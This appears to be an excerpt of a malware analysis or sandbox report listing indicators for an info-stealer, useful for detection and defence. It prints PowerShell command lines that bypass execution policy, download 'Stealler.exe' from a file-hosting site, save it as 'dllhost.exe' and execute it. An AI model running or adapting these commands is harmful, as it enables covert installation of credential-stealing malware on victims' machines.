Technical Information
- https://www.up##ad.ee/download/12393457/822fbdf77000180f0a2b/stealler.exe as dllhost.exe
- 'up##ad.ee':443
- DNS ASK up##ad.ee
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ep bypass -nop -w 1 (New-Object System.Net.WebClient).DownloadFile('https://www.up##ad.ee/download/12393457/822fbdf77000180f0a2b/Stealler.exe','dllhost.exe')
- '%WINDIR%\syswow64\cmd.exe' /c powershell -ep bypass -nop -w 1 (New-Object -com Shell.Application).ShellExecute('dllhost.exe')
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ep bypass -nop -w 1 (New-Object -com Shell.Application).ShellExecute('dllhost.exe')
- '%WINDIR%\syswow64\dllhost.exe'